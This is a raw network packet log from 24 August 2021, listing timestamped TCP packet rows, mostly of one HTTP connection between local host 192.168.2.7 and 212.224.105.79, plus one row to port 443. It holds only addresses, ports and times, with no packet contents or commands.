Aug 24, 2021 08:46:56.734095097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734118938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734138966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734139919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734159946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734169006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734179020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734194994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734200954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734213114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734230042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734232903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734246016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734262943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734275103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734278917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734298944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734316111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734318972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734332085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734349966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734359026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734369040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734388113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734396935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734406948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734422922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734431982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734441996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734453917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734461069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734477997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734494925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734505892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734515905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734524965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734538078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734555960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734570980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734572887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734586000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734602928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734612942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734623909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734637022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734642982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734659910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734672070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734677076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734694004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734704971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734711885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734729052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734745979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734756947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734766006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734781027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734788895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734806061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734814882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734827042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734844923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.734858036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.734918118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.736707926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.736733913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.736751080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.736768007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.736783028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.736804008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.736809969 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.736840963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.736860037 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.740248919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.740271091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.740287066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.740307093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.740381956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.742420912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.742441893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.742501020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.756995916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757039070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757075071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757106066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757107973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757157087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757191896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757230043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757262945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757277966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757297993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757339954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757340908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757401943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757436037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757466078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757472992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757507086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757519960 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757574081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757607937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757623911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757643938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757674932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757713079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757729053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757752895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757776022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757776976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757801056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757827997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757838011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757853031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757874966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757900953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757924080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757941008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.757951021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.757976055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758001089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758028030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758054972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758066893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758081913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758105040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758121967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758132935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758158922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758179903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758183002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758207083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758238077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758258104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758280993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758295059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758304119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758327007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758351088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758357048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758373022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758399010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758418083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758441925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758464098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758466005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758486986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758511066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758516073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758533955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758548021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758584976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758615017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758626938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758641958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758666039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758680105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758688927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758733988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758739948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758764029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758786917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758809090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758810043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758832932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758866072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758886099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758912086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.758934021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.758935928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759002924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.759433985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759466887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759493113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759516954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759540081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759537935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.759562016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.759565115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.759613991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.764513969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.764542103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.764563084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.764583111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.764597893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.764601946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.764622927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.764631987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.764678001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.780919075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.780960083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781002045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781032085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781054974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781085968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781119108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781132936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781152010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781156063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781188011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781224966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781269073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781271935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781305075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781307936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781339884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781378031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781411886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781419039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781441927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781450033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781477928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781511068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781549931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781550884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781588078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781589031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781625986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781661987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781697989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781711102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781732082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781733990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781769037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781799078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781830072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781841040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781857967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781867027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781889915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781919003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781944036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781958103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.781968117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781994104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.781996965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782021046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782032967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782092094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782116890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782130003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782143116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782169104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782183886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782193899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782219887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782244921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782258034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782274961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782289028 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782303095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782327890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782354116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782367945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782378912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782401085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782403946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782429934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782443047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782454967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782485962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782491922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782512903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782537937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782563925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782577038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782588959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782610893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782613993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782639027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782651901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782664061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782695055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782721996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782736063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782747030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782764912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782772064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782798052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782831907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782839060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.782869101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.782872915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.786628008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.786664009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.786696911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.786727905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.786747932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.786757946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.786781073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.786786079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.786809921 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.804538012 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:56.805001974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805053949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805099964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805138111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805182934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805185080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805232048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805272102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805278063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805324078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805375099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805413961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805470943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805517912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805526972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805563927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805600882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805610895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805656910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805718899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805742979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805780888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805813074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805820942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805850983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805886984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805917025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805922985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805947065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.805951118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.805984974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806019068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806046009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806106091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806138039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806150913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.806169987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806199074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806229115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.806236982 CEST	49715	80	192.168.2.7	212.224.105.79
